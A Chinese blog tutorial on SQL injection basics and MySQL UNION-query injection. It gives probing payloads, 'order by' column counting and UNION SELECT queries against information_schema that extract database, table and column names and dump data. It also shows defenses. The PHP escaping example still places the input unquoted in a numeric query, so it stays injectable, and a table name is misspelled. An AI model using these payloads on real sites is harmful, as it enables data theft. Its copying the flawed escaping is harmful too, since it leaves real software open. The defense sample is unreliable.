sql注入基础&mysql联合查询方法

最新推荐文章于 2024-03-10 21:16:17 发布
最新推荐文章于 2024-03-10 21:16:17 发布
阅读量559 收藏 4
点赞数 4
分类专栏: sql注入 文章标签: SQL注入 联合查询 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43073001/article/details/89197282
版权

讲在前面:
网上有很多关于对sql注入的讲解,但是最后还是觉得自己总结一下更好一些,也希望自己写的把这一块讲的比较清楚,来帮助可能对sql注入的原理,产生原因,以及payload有写模糊的人。也欢迎大佬们及时斧正,一起交流

学习sql注入首先要对SQL语法有一个基本的了解,只少要对掌握sql的查询语句。本篇文章不涉及数据库基础的更多知识。只和大家说一下
select 为查询语句的关键字
from 后面跟查询的路径(查询路径指的是数据库 表 之类)
where 后面跟查询条件

一、sql注入攻击整体思路
1.寻找到SQL注入的位置
2.判断服务器类型和后台数据库类型
3.针对不通的服务器和数据库特点进行SQL注入攻击

二、sql注入原理
把sql语句插入网页url(GET)表单提交(POST) 还有cookie,从而欺骗服务器获取数据库敏感信息

三、防护:
1 、对用户的输入进行校验,接收到提交的参数对特殊字符进行转移,mysql_real_escape_string()函数可以将 \x00 \n \r \ ’ "等字符进行转义

<?php
	if (isset($_GET['Submit'])) {
    	$id = $_GET['id'];
    	$id = mysql_real_escape_string($id);    
    	$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
    	$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
    	$num = mysql_numrows($result);
    	$i=0;
    	while ($i < $num) {
        	$first = mysql_result($result,$i,"first_name");
        	$last = mysql_result($result,$i,"last_name");
        	echo '<pre>';
        	echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        	echo '</pre>';
		 $i++;
    			}
		}
	?>

2不要使用动态拼接
3用户的异常信息减少提示
4.采用sql语句预编译和绑定变量(使用PreparedStatement)

String sql = "select id, no from user where id=?";
        	PreparedStatement ps = conn.prepareStatement(sql);
        	ps.setInt(1, id);
        	ps.executeQuery();

采用了PreparedStatement,就会将sql语句:“select id, no from user where id=?” 预先编译好,后面你输入的参数,无论你输入的是什么,都不会影响该sql语句的 语法结构了,因为语法分析已经完成了,那么后面输入的参数,不会作为sql命令来执行的,只会被当做字符串字面值参数。

四、mysql数据库联合查询注入
  先说清楚几个问题:我们假设order by 查到的字段有5列,下面的1,2,3,4,5是占位符

  (1)在参数数值后面加‘ 发现页面报错
   (2) 在参数数值后面加 and 1=1 (页面回显正常) and 1=2 (页面又报错)
证明sql注入payload可以写入数据库并可以被服务器执行
  (3)在参数数值后面加 order by 加数字 判断字段数目(从高向低试)第一个回显正常页面的数字正确
  (4)查数据库
  union select 1,2,3,4,5 from information_schema.schemate
(在information_schema数据库中schemate表下存放着所有数据库的名字
databaes()用来查询数据库名字)
  (5)查表名
  union select 1,table_name,3,4,5 from information_schema.tables where TABLE_SCHEMA= ‘数据库名’ limit 0,1
(information_schema数据库tables表下table_name列存放着表名而table_schema列则是对应的是对应的数据库)
  (6)查列名
  and 1=2 union select 1,COLUMN_NAME,3,4,5 from information_schema.COLUMNS where
TABLE_NAME=’表名’ limit 0,1
(同理columns:(表)存放着列名 Column_name:(列)存着列名字)
  (7)查字段
  union select 1,列名1,列名2,4,5 from 数据库.表名 limit 0,1
  union select 1,group_concat(列名1),group_concat(列名2),4,5 from 数据库.表名 limit 0,1
(from 后面的 数据库.表名就是上面 (4)(5)步查出来的数据库和表名 切记中间有一个引英文的 ‘.’ )

zhaosir_X
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入联合查询
m0_56578216的博客
08-22 855
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨表查询。两条select 语句查询结果具有相同列数:对应的列数据类型相同(特殊情况下,条件被放松)。联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨表查询的方法。由于联合查询会将数据库中的两张表按照列数拼接(纵向拼接)后再进行查询,所以要求两条select语句查询的表必须******
需要多次执行sql语句时,使用预编译
lbmydream的博客
12-30 1894
1、Statement为每一条Sql语句生成执行计划, 如果要执行两条sql语句 select colume from table where colume=1; select colume from table where colume=2; 会生成两个执行计划,一千个查询就生成一千个执行计划。而生成计划是非常消耗资源的 2、PreparedStatement用于使用绑定变量重用执...
SQL注入简介
积极分子
07-27 291
一、简介 SQL 注入攻击(SQL Injection),简称注入攻击、SQL 注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。由于在设计程序时,忽略了对输入字符串中夹带的 SQL 指令的检查,被数据库误认为是正常的 SQL 指令而运行,进而使数据库受到攻击,可能导致数据被窃取、更改、删除,甚至执行系统命令等,以及进一步导致网站被嵌入恶意代码、被植入后门程序等危害。 常见发生位置 URL 参数提交,主要为 GET 请求参数 表单提交,主要是 POST 请求、也包括 GET 请求
SQL的联合查询注入学习
最新发布
2301_80034711的博客
03-10 741
SQL是操作数据库数据的结构化查询语句,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从而产生SQL注入。攻击者可以在事先定义好的查询语句的结尾上添加额外的SQL语句,从而对数据库服务器执行非授权的任意查询,获得相应的数据信息。4、分类:①GET注入:注入点在URL中②POST注入:注入点在POST提交的数据中③Head头注入:注入点在请求头中①有回显注入(显错注入):执行语句后可以把具体内容反馈出来。
SQL注入学习【上】
m0_49420271的博客
06-08 122
Web 程序代码中对于用户提交的参数未做过滤就直接放到 SQL 语句中执行,导致参数中的特殊字符打破了 SQL 语句原有逻辑,黑客可以利用该漏洞执行任意 SQL 语句,如查询数据、下载数据、写入 webshell 、执行系统命令以及绕过登录限制等。
SQL 注入如何进行攻击与如何防护!!!
2201_75719295的博客
03-22 483
上面用两个实例分析了SQL注入攻击的技巧,可以看到,但凡有SQL注入漏洞的程序,都是因为程序要接受来自客户端用户输入的变量或URL传递的参数,并且这个变量或参数是组成SQL语句的一部分,对于用户输入的内容或传递的参数,我们应该要时刻保持警惕,这是安全领域里的「外部数据不可信任」的原则,纵观Web安全领域的各种攻击方式,大多数都是因为开发者违反了这个原则而导致的,所以自然能想到的,就是从变量的检测、过滤、验证下手,确保变量是开发者所预想的。当然也并不是每一个都能成功,但可以肯定的是,这个彩虹表会越来越完善。
漏洞总结——SQL注入
Spontaneous_0的博客
09-09 58
当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或 修改数据库中的数据。
关于sql注入你不得不知道的那些事
qq_42551635的博客
08-27 893
关于SQL注入你不得不知道的那些事 任务目标:通过手动注入尝试,了解注入的整个过程 任务要求: 1、手工测试之前搭建的不同注入环境,并记录 sql 语句,最终以获取 mysql 中的用户信息和当前表的信息为目标 2、思考通过注入漏洞可以做什么? 3、思考注入漏洞如何防御?代码、服务器等角度 扩展学习: 1、针对不同的注入漏洞,编写防御代码,具体如何防御自己决定(相关代码均记录在报告中) 2、测试自己的防御代码是否可以绕过,并将过程进行记录 前言:什么是sql 注入 在Web应用的开发过程中,为了快.
SQL注入-联合查询注入
m0_53820621的博客
08-10 3461
SQL注入-联合查询注入
Sql server之sql注入
weixin_34021089的博客
04-15 384
SQL Injection 关于sql注入的危害在这里就不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下   防范sql注入方法无非有以下几种: 1.使用类型安全的SQL参数2.使用参数化输入存储过程3.使用参数集合与动态SQL4.输入滤波5.过滤LIKE条款的特殊字符 ...如果有遗漏的也欢迎园子的大大们指教。 Sample: var...
计算机病毒与防护:MYSQL联合查询上.ppt
06-10
单击此处添加标题 * * * * * * * * * * * * 目录页 MYSQL联合查询联合查询注入原理-SQL的union查询 SQL中UNION 操作符用于合并两个或多个 SELECT 语句的结果集。UNION 内部的 SELECT 语句必须拥有相同数量的列。...
计算机病毒与防护:MYSQL联合查询下.ppt
06-10
单击此处添加标题 * * * * * * * * * * 目录页 MYSQL联合查询联合查询注入原理-判断数据输出位置 SELECT 语句的特殊用法: 当SELECT关键字后跟随的字段名为数字时,结果集也将是对应的数字,如: 联合查询注入...
SqlMap-Sql注入
08-02
完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 支持枚举用户、密码、哈希、...
sqlmap 自动化的SQL注入工具
01-01
2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 4、支持枚举用户、密码、...
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询
SQL 注入——联合查询
weixin_51559599的博客
11-06 467
information_schema 元数据库中的 columns 表中存储着数据库中所有的列。information_schema 元数据库中的 tables 表中存储着数据库中所有的表。语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询。如果报错,则说明没有该列,继续向小的数字更改查询,直到查询出列数最大值。总共有 517 个表名,因为此前查出在 cms 表中,增加筛选条件。此处因为联合查询,每列的数据类型不同而报错,将。查看 cms_users 表中的字段。连接显示出整列中的内容。
sql注入详解
m0_67392811的博客
06-12 5488
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql联合查询注入
m0_65977612的博客
11-18 918
sql联合查询注入
SQL注入联合查询注入
qq_45691294的博客
07-11 6858
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
mysql模糊查询Sql注入的问题
08-04
MySQL中,模糊查询的SQL注入问题是一个需要注意的安全隐患。当我们在拼接模糊查询条件时,如果不对输入参数进行处理,就有可能导致SQL注入攻击。引用[1]中提到,在使用MyBatis进行模糊查询时,如果将模糊查询条件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值